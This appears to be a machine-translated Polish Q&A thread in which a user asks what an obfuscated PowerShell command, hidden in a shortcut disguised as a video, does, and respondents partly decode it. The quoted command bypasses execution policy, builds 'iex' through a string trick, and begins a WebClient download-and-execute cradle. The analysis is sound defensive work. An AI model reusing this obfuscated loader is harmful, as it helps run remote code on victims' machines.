Mam plik, który powinien być filmem, ale okazał się skrótem do wykonania polecenia PowerShell. Szczegóły są następujące:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP &( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')( ('73w69Y88!40%78%101Y119%45!79c98!106%101!99!116c32c83G121Y115w116v101!109c46w78w101%116u46v87c101Y98%67%108b105:101w110G116%.
Czy ktoś może doradzić, co zrobiłaby ta komenda PowerShell lub gdzie mogę znaleźć szczegółowe informacje na temat jej dekodowania
Dzięki
powershell
malware
kfbnlet
źródło
źródło
powershell.exe /?
aby zobaczyć, jakie są pierwsze trzy-something
pozycje. [2] biegnij,( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')
aby zobaczyć, co to jest. jeśli nie znasz aliasów, uruchomGet-Alias
z tego wyjście. [3] reszta to prawdopodobnie początek polecenia zakodowanego w standardzie base64. to nie wszystko, więc nie ma sposobu, aby się tego upewnić.Odpowiedzi:
powershell.exe -NoPr -WINd 1 -eXEc ByP
jestpowershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy bypass
Polecenie, które próbuje wykonać,
$verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN''
jest w rzeczywistościiex
aliasemInvoke-Expression
Uważam, że przegapiłeś część wiersza poleceń, więc trudno jest powiedzieć, co oznacza reszta.
źródło